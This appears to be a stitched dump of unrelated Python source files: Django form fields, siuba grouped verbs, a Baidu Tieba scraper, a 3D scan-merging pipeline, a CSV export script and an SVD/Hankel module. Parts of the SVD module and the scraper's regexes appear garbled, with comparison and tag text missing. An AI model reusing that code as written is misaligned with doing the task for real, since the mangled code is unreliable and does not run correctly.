format'))\n\n # Try to coerce the value to unicode.\n unicode_value1 = force_text(dates[0], strings_only=True)\n unicode_value2 = force_text(dates[1], strings_only=True)\n\n if isinstance(unicode_value1, six.text_type):\n value1 = unicode_value1.strip()\n if isinstance(unicode_value2, six.text_type):\n value2 = unicode_value2.strip()\n\n # If unicode, try to strptime against each input format.\n if isinstance(value1, six.text_type):\n for format in self.input_formats:\n try:\n value1 = self.strptime(value1, format)\n except (ValueError, TypeError):\n continue\n if isinstance(value2, six.text_type):\n for format in self.input_formats:\n try:\n value2 = self.strptime(value2, format)\n except (ValueError, TypeError):\n continue\n\n if value1 in self.empty_values:\n return None\n if isinstance(value1, datetime.datetime):\n valid_data.append(value1.date())\n if isinstance(value1, datetime.date):\n valid_data.append(value1)\n\n if value2 in self.empty_values:\n return None\n if isinstance(value2, datetime.datetime):\n valid_data.append(value2.date())\n if isinstance(value2, datetime.date):\n valid_data.append(value2)\n\n if len(valid_data) != 2:\n raise ValidationError(self.error_messages['invalid'], code='invalid')\n\n return super(DateRangeField, self).to_python(valid_data)\n\n def strptime(self, value, format):\n return datetime.datetime.strptime(force_str(value), format).date()\n","sub_path":"apps/accounts/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"634380857","text":"from mod_base import *\n\n\nclass Config(Command):\n def run(self, app, editor):\n path = app.config.path()\n f = 
app.file_is_open(path)\n if f:\n app.switch_to_file(app.get_file_index(f))\n else:\n if not app.open_file(path):\n app.new_file(path)\n app.switch_to_file(app.last_file_index())\n\nmodule = {\n \"class\": Config,\n \"name\": \"config\",\n}\n","sub_path":"modules/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"348828658","text":"from siuba.spec.series import spec\nfrom siuba.siu import CallTreeLocal, FunctionLookupError\n\nfrom siuba.experimental.pd_groups.translate import SeriesGroupBy, GroupByAgg, GROUP_METHODS\n\n\n# TODO: make into CallTreeLocal factory function\n\nout = {}\ncall_props = set()\nfor name, entry in spec.items():\n #if entry['result']['type']: continue\n kind = entry['action'].get('kind') or entry['action'].get('status')\n key = (kind.title(), entry['action']['data_arity'])\n\n # add properties like df.dtype, so we know they are method calls\n if entry['is_property'] and not entry['accessor']:\n call_props.add(name)\n\n\n meth = GROUP_METHODS[key](\n name = name.split('.')[-1],\n is_property = entry['is_property'],\n accessor = entry['accessor']\n )\n\n # TODO: returning this exception class from group methods is weird, but I \n # think also used in tests\n if meth is NotImplementedError:\n continue\n\n out[name] = meth\n\ncall_listener = CallTreeLocal(\n out,\n call_sub_attr = ('str', 'dt', 'cat', 'sparse'),\n chain_sub_attr = True,\n dispatch_cls = GroupByAgg,\n result_cls = SeriesGroupBy,\n call_props = call_props\n )\n\n\n# Fast group by verbs =========================================================\n\nfrom siuba.siu import Call\nfrom siuba.dply.verbs import mutate, filter, summarize, singledispatch2, DataFrameGroupBy, _regroup\nfrom pandas.core.dtypes.inference import is_scalar\nimport warnings\n\ndef fallback_warning(expr, reason):\n warnings.warn(\n \"The expression below cannot be executed quickly. \"\n \"Using the slow (but general) pandas apply method.\"\n \"\\n\\nExpression: {}\\nReason: {}\"\n .format(expr, reason)\n )\n\n\ndef grouped_eval(__data, expr, require_agg = False):\n if is_scalar(expr):\n return expr\n \n if isinstance(expr, Call):\n try:\n call = call_listener.enter(expr)\n except FunctionLookupError as e:\n fallback_warning(expr, str(e))\n call = expr\n\n #\n grouped_res = call(__data)\n\n if isinstance(grouped_res, GroupByAgg):\n # TODO: may want to validate its grouper\n if require_agg:\n # need an agg, got an agg. 
we are done.\n if not grouped_res._orig_grouper is __data.grouper:\n raise ValueError(\"Incompatible groupers\")\n return grouped_res\n else:\n # broadcast from aggregate to original length (like transform)\n return grouped_res._broadcast_agg_result()\n elif isinstance(grouped_res, SeriesGroupBy) and not require_agg:\n # TODO: may want to validate its grouper\n return grouped_res.obj\n else:\n # can happen right now if user selects, e.g., a property of the\n # groupby object, like .dtype, which returns a single value\n # in the future, could restrict set of operations user could perform\n raise ValueError(\"Result must be subclass of SeriesGroupBy\")\n\n raise ValueError(\"Grouped expressions must be a siu expression or scalar\")\n\n\n\n# Fast mutate ----\n\ndef _transform_args(args):\n out = []\n for expr in args:\n if is_scalar(expr):\n out.append(expr)\n elif isinstance(expr, Call):\n try:\n call = call_listener.enter(expr)\n out.append(call)\n except FunctionLookupError as e:\n fallback_warning(expr, str(e))\n return None\n elif callable(expr):\n return None\n\n return out\n\n@singledispatch2(DataFrameGroupBy)\ndef fast_mutate(__data, **kwargs):\n \"\"\"Warning: this function is experimental\"\"\"\n\n # transform call trees, potentially bail out to slow method --------\n new_vals = _transform_args(kwargs.values())\n\n if new_vals is None:\n return mutate(__data, **kwargs)\n\n\n # perform fast method ----\n out = __data.obj.copy()\n groupings = __data.grouper.groupings\n\n\n for name, expr in zip(kwargs, new_vals):\n res = grouped_eval(__data, expr)\n out[name] = res\n\n return out.groupby(groupings)\n\n\n@fast_mutate.register(object)\ndef _fast_mutate_default(__data, **kwargs):\n # TODO: had to register object second, since singledispatch2 sets object dispatch\n # to be a pipe (e.g. unknown types become a pipe by default)\n # by default dispatch to regular mutate\n f = mutate.registry[type(__data)]\n return f(__data, **kwargs)\n\n\n# Fast filter ----\n\n@singledispatch2(DataFrameGroupBy)\ndef fast_filter(__data, *args):\n \"\"\"Warning: this function is experimental\"\"\"\n\n # transform call trees, potentially bail out to slow method --------\n new_vals = _transform_args(args)\n\n if new_vals is None:\n return filter(__data, *args)\n\n # perform fast method ----\n out = []\n groupings = __data.grouper.groupings\n\n for expr in args:\n res = grouped_eval(__data, expr)\n out.append(res)\n\n filter_df = filter.registry[__data.obj.__class__]\n\n df_result = filter_df(__data.obj, *out)\n\n # TODO: research how to efficiently & robustly subset groupings\n group_names = [ping.name for ping in groupings]\n return df_result.groupby(group_names)\n\n\n@fast_filter.register(object)\ndef _fast_filter_default(__data, *args, **kwargs):\n # TODO: had to register object second, since singledispatch2 sets object dispatch\n # to be a pipe (e.g. 
unknown types become a pipe by default)\n # by default dispatch to regular mutate\n f = filter.registry[type(__data)]\n return f(__data, *args, **kwargs)\n\n\n# Fast summarize ----\n\n@singledispatch2(DataFrameGroupBy)\ndef fast_summarize(__data, **kwargs):\n \"\"\"Warning: this function is experimental\"\"\"\n\n # transform call trees, potentially bail out to slow method --------\n new_vals = _transform_args(kwargs.values())\n\n if new_vals is None:\n return summarize(__data, **kwargs)\n\n # perform fast method ----\n groupings = __data.grouper.groupings\n\n # TODO: better way of getting this frame?\n out = __data.grouper.result_index.to_frame()\n \n for name, expr in kwargs.items():\n # special case: set scalars directly\n res = grouped_eval(__data, expr, require_agg = True)\n\n if isinstance(res, GroupByAgg):\n # TODO: would be faster to check that res has matching grouper, since\n # here it goes through the work of matching up indexes (which if\n # the groupers match are identical)\n out[name] = res.obj\n\n # otherwise, assign like a scalar\n else:\n out[name] = res\n\n return out.reset_index(drop = True)\n\n\n@fast_summarize.register(object)\ndef _fast_summarize_default(__data, **kwargs):\n # TODO: had to register object second, since singledispatch2 sets object dispatch\n # to be a pipe (e.g. unknown types become a pipe by default)\n # by default dispatch to regular mutate\n f = summarize.registry[type(__data)]\n return f(__data, **kwargs)\n\n","sub_path":"siuba/experimental/pd_groups/dialect.py","file_name":"dialect.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"506533827","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n' Crawler practice: Baidu Tieba '\n\n__author__ = 'shijiawei'\n\nimport urllib.request\nimport urllib\nimport http.cookiejar\nimport re\nfrom pachongTool import pcTool\n\nclass BDTB:\n def __init__(self,url,seelz):\n self.url=url\n self.seelz=\"?see_lz=\"+str(seelz)\n self.pctool=pcTool()\n\n def getPage(self,pageNum):\n try:\n url=self.url+self.seelz+\"&pn=\"+str(pageNum)\n request=urllib.request.Request(url)\n response=urllib.request.urlopen(request)\n return response.read().decode(\"utf-8\")\n except urllib.request.URLError as e:\n if hasattr(e,\"reason\"):\n print(\"Failed to connect to Baidu Tieba: \"+e.reason)\n return None\n\n def getTiebaName(self, pageresult):\n page = pageresult\n patten = re.compile('(.*?)_(.*?)_百度贴吧', re.S)\n result = re.search(patten, page)\n if result:\n return result.group(2).strip()\n else:\n return None\n\n def getTitle(self,pageresult):\n page=pageresult\n patten=re.compile('(.*?)_(.*?)_百度贴吧',re.S)\n result=re.search(patten,page)\n if result:\n return result.group(1).strip()\n else:\n return None\n def getAllNum(self,pageresult):\n page=pageresult\n patten=re.compile('共(.*?)页',re.S)\n result=re.search(patten,page)\n if result:\n return result.group(1).strip()\n else:\n return None\n\n def printContent(self,pageresult):\n page=pageresult\n patten=re.compile('\"date\":\"(.*?)\".*?\"post_no\":(.*?),\".*?
      (.*?)
      ',re.S)\n results=re.findall(patten,page)\n for result in results:\n print(\"\\n\")\n print(result[1] + \" floor \")\n print(\"Time \"+result[0]+\" \")\n print(self.pctool.replace(result[2]))\n\n\n\nURL=\"http://tieba.baidu.com/p/3138733512\"\nURL2=\"http://tieba.baidu.com/p/4723966685\"\n#second argument 0: view all floors 1: only the original poster's posts\nbdtb=BDTB(URL2,0)\nresult=bdtb.getPage(1)\n# print(result)\nprint(\"Tieba name: \"+bdtb.getTiebaName(result))\nprint(\"Title: \"+bdtb.getTitle(result))\nprint(\"Total pages: \"+bdtb.getAllNum(result))\nbdtb.printContent(result)","sub_path":"tieba_pachong.py","file_name":"tieba_pachong.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"327334085","text":"#parallel preprocess scan data\n#automatically download image data and preprocess them\n\nimport os\nimport subprocess\nimport logging\nimport shutil\nimport time\n\nimport numpy as np\nimport trimesh\nfrom datetime import datetime\n\ndef obj2ply(objFile, plyFile):\n mesh = trimesh.load(objFile,process=None)\n mesh.export(plyFile,\"ply\",encoding='ascii',vertex_normal=True)\n # mesh = pymesh.load_mesh(objFile)\n # pymesh.save_mesh(plyFile, mesh, ascii=True)\n return\n\ndef ply2obj(plyFile, objFile):\n mesh = trimesh.load(plyFile,process=None,vertex_normal=True)\n print(len(mesh.vertex_normals))\n mesh.export(objFile)\n return\n\ndef rmBadFace(objFile,objRFile):\n mesh = trimesh.load(objFile)\n mesh.remove_degenerate_faces()\n mesh.export(objRFile)\n\ndef _logpath(path, names):\n print('Working in %s' % path)\n return [] # nothing will be ignored\n\nif __name__ == \"__main__\":\n\n ImageMagicPath = r\"C:/Program Files/ImageMagick-7.0.8-Q16-HDRI\"\n BUILD_ROOT = r\"D:\\v-jiazha\\2-workspaces\\Source\\ObjectCap\\x64\\Release\"\n TOOL_ROOT = r\"D:\\v-jiazha\\4-projects\\5-LED\\2-Source\\2-3rdTool\"\n DATA_ROOT = r\"D:\\v-jiazha\\4-projects\\5-LED\\2-Source\\4-MVS\"\n DATA_ROOT_E = r\"E:\\v-jiazha\\4-projects\\5-LED\\2-Source\\4-MVS\"\n TOOL_LCT_ROOT = r\"D:\\v-jiazha\\4-projects\\5-LED\\2-Source\\2-3rdTool\\LCT\"\n COMMON_ROOT = os.path.join(DATA_ROOT, r'RealCommon')\n CONFIG_ROOT = os.path.join(COMMON_ROOT,r\"Config0301\")\n\n\n logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n\n v_size = 184\n u_size = 224\n nTotal = 409\n\n # Option Setting\n # positionStr = r\"0.1982,-0.0921,0\"\n positionStr = r\"0.1988,-0.09269,0\"\n nViewsCount = 36\n nViews = \"36\"\n # Bases Setting\n generics = \"20\"\n genericStart = \"0.01\"\n genericEnd = \"0.60\"\n genericRoughnesses = \"0.01,0.02,0.04,0.07,0.09,0.11,0.13,0.16,0.20,0.25,0.40\"\n # genericRoughnesses = \"0.01,0.02,0.03,0.05,0.07,0.09,0.11,0.13,0.16,0.20,0.25\"\n\n # Downsampled lights\n rowScanWidth = \"7\"\n rowScanHeight = \"1\"\n colScanWidth = \"1\"\n colScanHeight = \"23\"\n\n # OBJECT_MERGE = r\"RealObject-cookiesMerge\"\n # OBJECT_MERGE = r\"RealObject-oatmealMerge\"\n OBJECT_MERGE = r\"RealObject-giftMerge\"\n OBJECT_ROOT_MERGE = os.path.join(DATA_ROOT, r'Object',OBJECT_MERGE)\n OBJECT_Model_Dir_MERGE = os.path.join(OBJECT_ROOT_MERGE, \"Recover\", \"Model\",\"FinalSfM\")\n\n # OBJECT1 = r\"RealObject-oatmeal\"\n OBJECT1 = r\"RealObject-gift1\"\n OBJECT_ROOT1 = os.path.join(DATA_ROOT_E, r'Object',OBJECT1)\n OBJECT_ViewDir1 = os.path.join(OBJECT_ROOT1, \"Views\", \"View_%04d\")\n OBJECT_Model_Dir1 = os.path.join(OBJECT_ROOT1, \"Recover\", \"Model\",\"FinalOpt\")\n\n # OBJECT2 = 
r\"RealObject-oatmeal2\"\n OBJECT2 = r\"RealObject-gift2\"\n OBJECT_ROOT2 = os.path.join(DATA_ROOT, r'Object',OBJECT2)\n OBJECT_ViewDir2 = os.path.join(OBJECT_ROOT2, \"Views\", \"View_%04d\")\n OBJECT_Model_Dir2 = os.path.join(OBJECT_ROOT2, \"Recover\", \"Model\",\"FinalOpt\")\n\n # Setup setting: camera,\n cameraConfig1 = os.path.join(CONFIG_ROOT, \"Setup\" + OBJECT1, \"cameraConfig.txt\")\n cameraConfig2 = os.path.join(CONFIG_ROOT, \"Setup\" + OBJECT2, \"cameraConfig.txt\")\n\n # Camera extrinsic, scale setting\n viewScale = \"0.009\"\n # viewScale = \"1\"\n # cameraExtrinDirectory1 = os.path.join(OBJECT_ROOT1, \"ColmapSfM\", \"Extrinsic\")\n # cameraExtrinDirectory2 = os.path.join(OBJECT_ROOT2, \"ColmapSfM\", \"Extrinsic\")\n cameraExtrinDirectory1 = os.path.join(OBJECT_ROOT1, \"CalibPrism\", \"Extrinsic\")\n cameraExtrinDirectory2 = os.path.join(OBJECT_ROOT2, \"CalibPrism\", \"Extrinsic\")\n\n # keyPointsUVFile1 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsUV1.txt\")\n # keyPointsUVFile2 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsUV2.txt\")\n keyPointsUVFile1 = os.path.join(OBJECT_Model_Dir1,\"keyPointsUV.txt\")\n keyPointsUVFile2 = os.path.join(OBJECT_Model_Dir2,\"keyPointsUV.txt\")\n keyPointsPosFile1 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsPos1.txt\")\n keyPointsPosFile2 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsPos2.txt\")\n\n # tranform second point cloud into the first one\n transExtrinFile = os.path.join(OBJECT_Model_Dir_MERGE,\"transExtrin.txt\")\n # transExtrinFile = os.path.join(OBJECT_Model_Dir_MERGE,\"transExtrinIdentity.txt\")\n # refine normal MVS setting\n nrmRefRecDirName1 = \"refineNrBasesIter(WithTH)_rgbWeight=1_nrmWeight=10_dptWeight=10_fDistTH=1_nDptIters=2\"\n nrmRefRecDirName2 = \"refineNrBasesIter(WithTH)_rgbWeight=1_nrmWeight=10_dptWeight=10_fDistTH=1_nDptIters=2\"\n\n src1Model = os.path.join(OBJECT_ROOT1,\"Recover/Model/NrmRefine\",nrmRefRecDirName1,\"Comb_refine_.obj\")\n src2Model = os.path.join(OBJECT_ROOT2,\"Recover/Model/NrmRefine\",nrmRefRecDirName2,\"Comb_refine_.obj\")\n # src1Model = os.path.join(OBJECT_Model_Dir1,\"RecoverUpdate.obj\")\n # src2Model = os.path.join(OBJECT_Model_Dir2,\"RecoverUpdate.obj\")\n\n # alignColmapModel = os.path.join(OBJECT_Model_Dir_MERGE,\"fused.obj\")\n alignModel = os.path.join(OBJECT_Model_Dir_MERGE,\"AlignPoindCloud.obj\")\n # alignModel = os.path.join(OBJECT_Model_Dir_MERGE,\"fusedFlip.obj\")\n alignModelPly = os.path.join(OBJECT_Model_Dir_MERGE,\"AlignPoindCloud.ply\")\n # alignModelPly = os.path.join(OBJECT_Model_Dir_MERGE,\"fusedFlip.ply\")\n alignModelPoi = os.path.join(OBJECT_Model_Dir_MERGE,\"Align_Poi.ply\")\n alignModelTrim = os.path.join(OBJECT_Model_Dir_MERGE,\"Align_Trim.ply\")\n alignModelRec = os.path.join(OBJECT_Model_Dir_MERGE,\"Recover_clean.obj\")\n meshFinalDirObj = os.path.join(OBJECT_Model_Dir_MERGE,\"RecoverFinal_clean.obj\")\n\n # Colmap Setting\n OBJECT_ROOT_MERGE_SFM = os.path.join(OBJECT_ROOT_MERGE, r'SfMFromPrism')\n OBJECT_COLMAP_ROOT = os.path.join(OBJECT_ROOT_MERGE_SFM, \"SfM_FIRST_OBJECT\")\n colmap_sparse_model_dir = os.path.join(OBJECT_COLMAP_ROOT, \"sparse\", \"model\")\n colmap_sparse_modelUpt_dir = os.path.join(OBJECT_COLMAP_ROOT, \"sparse\", \"modelUpt\", \"vocab-tree.bin\")\n imageListFile = os.path.join(colmap_sparse_modelUpt_dir, 'images.txt')\n\n # Option setting\n CapAlignPointCloudOpt = 0\n CleanPointCloudOption = 1\n logger.info(\"Start merging objects:\")\n if not os.path.exists( OBJECT_Model_Dir_MERGE):\n os.makedirs( OBJECT_Model_Dir_MERGE)\n 
_environ = dict(os.environ)\n try:\n if 'PATH' in _environ:\n os.environ['PATH'] = os.environ['PATH'] + \";\" + BUILD_ROOT + \";\" + TOOL_ROOT + \";\" + TOOL_LCT_ROOT\n else:\n os.environ['PATH'] = BUILD_ROOT + \";\" + TOOL_ROOT + \";\" + TOOL_LCT_ROOT\n\n if CapAlignPointCloudOpt:\n logger.info(\"Combine point clouds: \")\n cameraExtrinsic1 = os.path.join(cameraExtrinDirectory1, \"view_%04d.txt\")\n cameraExtrinsic2 = os.path.join(cameraExtrinDirectory2, \"view_%04d.txt\")\n\n selectCameraExtrinsic1 = cameraExtrinsic1 % 23\n selectCameraExtrinsic2 = cameraExtrinsic2 % 8\n re = subprocess.run(\n [\"CapTwoSeqTrans\", \"-src1ModelFile=\" + src1Model, \"-src2ModelFile=\" + src2Model,\n \"-tarModelFile=\" + alignModel,\n \"-cameraExtrin1=\" + selectCameraExtrinsic1,\n \"-cameraExtrin2=\" + selectCameraExtrinsic2,\n \"-transExtrin=\" + transExtrinFile,\n \"-imageListFile=\" + imageListFile,\n \"-viewScale=\" + viewScale, \"-flipZ\", \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n # # from ColMap: model need to be flipped\n # re = subprocess.run(\n # [\"ModelConvert.exe\", \"-srcModelFile=\" + alignColmapModel, \"-tarModelFile=\" + alignModel, \"-flipZ\", \"-flipY\"],\n # stdout=True, stderr=True, check=True)\n obj2ply(alignModel, alignModelPly)\n logger.info(\"PoissonRecon: \")\n re = subprocess.run(\n [\"PoissonRecon.exe\", \"--in\", alignModelPly, \"--out\", alignModelPoi, \"--normals\", \"--pointWeight\",\n \"0\",\n \"--depth\",\n \"10\", \"--density\", \"--threads\",\"16\"], stdout=True, stderr=True,\n check=True)\n # trim combined mesh\n re = subprocess.run(\n [\"SurfaceTrimmer.exe\", \"--in\", alignModelPoi, \"--out\", alignModelTrim, \"--trim\", \"6\"],\n stdout=True, stderr=True, check=True)\n ply2obj(alignModelTrim,alignModelRec)\n shutil.copy(alignModelRec,meshFinalDirObj)\n\n if CleanPointCloudOption:\n logger.info(\"Clean point cloud \")\n\n CapMultiSimOption = 1\n CapDilateMaskOption = 1\n CapCleanOption = 1\n clean_nIters = 1\n\n # each view: format string\n viewDirectory1 = os.path.join(OBJECT_ROOT1, \"Views\", \"View_%04d\")\n nrmRefineDirectory1 = os.path.join(viewDirectory1, \"Recover/NrmRefine\")\n viewMeshCleanDir1 = os.path.join(nrmRefineDirectory1, \"Iter_Merge_Clean\")\n\n viewDirectory2 = os.path.join(OBJECT_ROOT2, \"Views\", \"View_%04d\")\n nrmRefineDirectory2 = os.path.join(viewDirectory2, \"Recover/NrmRefine\")\n viewMeshCleanDir2 = os.path.join(nrmRefineDirectory2, \"Iter_Merge_Clean\")\n\n # recovered model dir:\n meshFinalDir = OBJECT_Model_Dir_MERGE\n iterDir = os.path.join(meshFinalDir, \"Iter_Merge_Clean\")\n firstRecModel = alignModelRec\n firstCombModel = alignModel\n if not os.path.exists(iterDir):\n os.makedirs(iterDir)\n\n # combined\n for iter in range(clean_nIters):\n logger.info(\"Iter: {} \".format(iter) )\n viewIterDir1 = os.path.join(viewMeshCleanDir1,\"Iter_%04d\" % iter)\n viewIterFramesDir1 = os.path.join(viewIterDir1, \"Frames\")\n viewIterDir2 = os.path.join(viewMeshCleanDir2,\"Iter_%04d\" % iter)\n viewIterFramesDir2 = os.path.join(viewIterDir2, \"Frames\")\n\n cleanModel = os.path.join(iterDir,\"Iter_%04d_clean.obj\")\n cleanModelPly = os.path.join(iterDir, \"Iter_%04d_clean.ply\")\n poissonModel = os.path.join(iterDir,\"Iter_%04d_poi.ply\")\n trimModel = os.path.join(iterDir,\"Iter_%04d_trim.ply\")\n recModel = os.path.join(iterDir,\"Iter_%04d_rec.obj\")\n preModel = recModel % (iter-1)\n preComModel = cleanModel % (iter -1)\n if iter == 0:\n preModel = firstRecModel\n preComModel = firstCombModel\n\n 
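# In the PoissonRecon/SurfaceTrimmer invocations used in this loop (flags per\n # the published PoissonRecon command line): --depth sets the octree depth,\n # --pointWeight the interpolation weight, and --density emits per-vertex\n # density values that SurfaceTrimmer thresholds via --trim to cut away\n # low-support surface, e.g. PoissonRecon --in pts.ply --out mesh.ply --depth 10 --density\n 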
logger.info(\"CapMultiSim \")\n CapMultiSimOption = 1\n if CapMultiSimOption:\n logger.info(\"CapMultiSim first object 1\")\n cameraExtrinsic1 = os.path.join(cameraExtrinDirectory1, \"view_%04d.txt\")\n renderOption = \"2\"\n re = subprocess.run(\n [\"CapMultiSim\", \"-framesDirectory=\" + viewIterFramesDir1,\n \"-modelFile=\" + preModel,\n \"-cameraConfig=\" + cameraConfig1, \"-cameraExtrin=\" + cameraExtrinsic1,\n \"-viewScale=\" + viewScale, \"-flipZ\",\n \"-renderOption=\" + renderOption, \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n logger.info(\"CapMultiSim first object 2\")\n cameraExtrinsic2 = os.path.join(cameraExtrinDirectory2, \"view_%04d.txt\")\n renderOption = \"2\"\n re = subprocess.run(\n [\"CapMultiSim\", \"-framesDirectory=\" + viewIterFramesDir2,\n \"-modelFile=\" + preModel,\n \"-cameraConfig=\" + cameraConfig2, \"-cameraExtrin=\" + cameraExtrinsic2,\n # \"-transExtrin=\" + transExtrinFile,\n \"-viewScale=\" + viewScale, \"-flipZ\",\n \"-renderOption=\" + renderOption, \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n logger.info(\"Dilate mask \")\n if CapDilateMaskOption:\n # dilate masks\n for v in range(nViewsCount):\n nDil = \"2\"\n inputFile = os.path.join(viewIterFramesDir1 % v, \"mask.pfm\")\n outputFile = os.path.join(viewIterFramesDir1 % v, \"mask_dil.pfm\")\n re = subprocess.run(\n [\"ImgDilator\", \"-in=\" + inputFile, \"-out=\" + outputFile, \"-n=\"+nDil], stdout=True, stderr=True,\n check=True)\n for v in range(nViewsCount):\n nDil = \"2\"\n inputFile = os.path.join(viewIterFramesDir2 % v, \"mask.pfm\")\n outputFile = os.path.join(viewIterFramesDir2 % v, \"mask_dil.pfm\")\n re = subprocess.run(\n [\"ImgDilator\", \"-in=\" + inputFile, \"-out=\" + outputFile, \"-n=\" + nDil], stdout=True,\n stderr=True,\n check=True)\n\n logger.info(\"Clean outliers \")\n if CapCleanOption:\n cameraExtrinsic1 = os.path.join(cameraExtrinDirectory1, \"view_%04d.txt\")\n viewMaskImgFile1 = os.path.join(viewIterFramesDir1, \"mask_dil.pfm\")\n srcModel = preComModel\n tarModel = cleanModel % iter\n re = subprocess.run(\n [\"CapCleanPointCloud\", \"-cameraConfig=\" + cameraConfig1, \"-cameraExtrin=\" + cameraExtrinsic1,\n \"-viewMaskImgFile=\" + viewMaskImgFile1,\n \"-srcModelFile=\" + srcModel, \"-tarModelFile=\" + tarModel,\n \"-viewScale=\" + viewScale, \"-flipZ\", \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n cameraExtrinsic2 = os.path.join(cameraExtrinDirectory2, \"view_%04d.txt\")\n viewMaskImgFile2 = os.path.join(viewIterFramesDir2, \"mask_dil.pfm\")\n srcModel = cleanModel % iter\n tarModel = cleanModel % iter\n re = subprocess.run(\n [\"CapCleanPointCloud\", \"-cameraConfig=\" + cameraConfig2, \"-cameraExtrin=\" + cameraExtrinsic2,\n \"-viewMaskImgFile=\" + viewMaskImgFile2,\n \"-srcModelFile=\" + srcModel, \"-tarModelFile=\" + tarModel,\n \"-viewScale=\" + viewScale, \"-flipZ\", \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n # poisson reconstruct combined mesh\n\n modelInP = cleanModelPly % iter\n modelOutP = poissonModel % iter\n obj2ply(cleanModel % iter,modelInP)\n re = subprocess.run(\n [\"PoissonRecon.exe\", \"--in\", modelInP, \"--out\", modelOutP, \"--normals\",\n \"--pointWeight\", \"0\",\n \"--depth\",\n \"10\", \"--density\", \"--threads\", \"16\", \"--samplesPerNode\", \"5\"], stdout=True,\n stderr=True, check=True)\n # trim combined mesh\n modelInT = modelOutP\n modelOutT = trimModel % iter\n re = subprocess.run(\n [\"SurfaceTrimmer.exe\", \"--in\", modelInT, \"--out\", modelOutT, 
\"--trim\",\n \"6\"],\n stdout=True, stderr=True, check=True)\n ply2obj(modelOutT, recModel % iter)\n\n\n shutil.copy(recModel % (clean_nIters - 1), meshFinalDirObj)\n\n\n\n\n finally:\n os.environ.clear()\n os.environ.update(_environ)\n\n\n","sub_path":"Script/RMVS/RMVSCapAlignMergeRouPointCloudSfM(36+1).py","file_name":"RMVSCapAlignMergeRouPointCloudSfM(36+1).py","file_ext":"py","file_size_in_byte":15824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"311095428","text":"import csv\n\n\nuser_list = [\n{'first_name':'Anry', 'last_name':'Bolt', 'email':'anry@yandex.ru', 'gender':'male', 'age':'34'},\n{'first_name':'Vilthor', 'last_name':'Simmon', 'email':'si_87@google.com', 'gender':'male', 'age':'39'}\n]\n\nwith open('export.csv', 'w', encoding='utf-8', newline='') as f:\n fields = ['first_name', 'last_name', 'email', 'gender', 'age']\n writer = csv.DictWriter(f, fields, delimiter=';')\n writer.writeheader()\n for user in user_list:\n writer.writerow(user)","sub_path":"export_users.py","file_name":"export_users.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"160211189","text":"import numpy as np\r\nimport igraph as ig\r\n\r\n\r\n\r\ndef get_timeline_matrix(timeline, window):\r\n matrix = []\r\n values = list(timeline.values())\r\n for i in range(0, len(timeline.items())-window):\r\n matrix.append(values[i:i+window])\r\n return np.matrix(matrix)\r\n\r\ndef get_x_house(trajectory_matrix, u_matrix, window):\r\n res = np.zeros((u_matrix.shape[1], trajectory_matrix.shape[1]))\r\n for i in range(0, window):\r\n u_vec=u_matrix[i]\r\n test = u_vec.transpose().dot(trajectory_matrix).reshape(trajectory_matrix.shape[1])\r\n xuy = u_vec.reshape((u_vec.shape[0],1)).dot(test)\r\n res += xuy\r\n return res;\r\n\r\n\r\n\r\ndef hankellize(mat):\r\n l_star = 0\r\n k_star = 0\r\n if mat.shape[0]>mat.shape[1]:\r\n l_star = mat.shape[1]\r\n else:\r\n l_star = mat.shape[0]\r\n\r\n if mat.shape[0]=0 and k<(l_star-1):\r\n for m in range(0, k+1):\r\n sub_res+=mat[m,k-m]\r\n g.append((1/(k+1))*sub_res)\r\n \r\n if (l_star-1)<=k and k<=k_star-1:\r\n for m in range(0, l_star):\r\n sub_res+=mat[m,k-m]\r\n g.append((1/l_star)*sub_res)\r\n if k_star< k and k<= big_n:\r\n for m in range(k-k_star, mat.shape[0]-k_star):\r\n sub_res+=mat[m,k-m]\r\n g.append((1/(big_n-k))*sub_res)\r\n return g;\r\n","sub_path":"SVD_module.py","file_name":"SVD_module.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"336005311","text":"import sys\nfrom moe.optimal_learning.python.data_containers import HistoricalData\nimport numpy as np\nimport pickle\nfrom pickle import dump\nfrom joblib import Parallel, delayed\n\nnp.set_printoptions(threshold=sys.maxint)\n\n# ================================================================================================= #\n# generate initial data #\n# (single IS) #\n# ================================================================================================= #\n\n# --------------------------------------------------------------------------- #\n# load from file #\n# --------------------------------------------------------------------------- #\ndef load_sample_data(problem, num_per_var, exp_path, result_path):\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n with 
